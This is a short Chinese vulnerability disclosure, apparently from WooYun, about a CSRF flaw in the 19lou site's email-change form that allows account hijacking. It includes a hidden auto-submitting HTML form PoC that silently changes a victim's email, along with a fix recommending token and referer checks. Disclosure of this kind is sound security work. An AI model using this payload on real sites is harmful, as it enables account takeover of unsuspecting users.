修改邮箱处无token,可劫持用户帐号。

十九楼csrf可劫持用户帐号

POC:

<form method="POST" action="" name="vipcsrf" target="hidden_frame"> <input type="text" name="email" value="root@wooyun.org" style="DISPLAY: none"></input> </form><iframe style="DISPLAY: none" id=hidden_frame name=hidden_frame></iframe> <script>document.vipcsrf.submit();</script>

访问这个页面后,在不知情的情况下,用户的邮箱就被更改了。

十九楼csrf可劫持用户帐号


修复方案:

可参考乌云知识库里的文章,进行token、referer等防御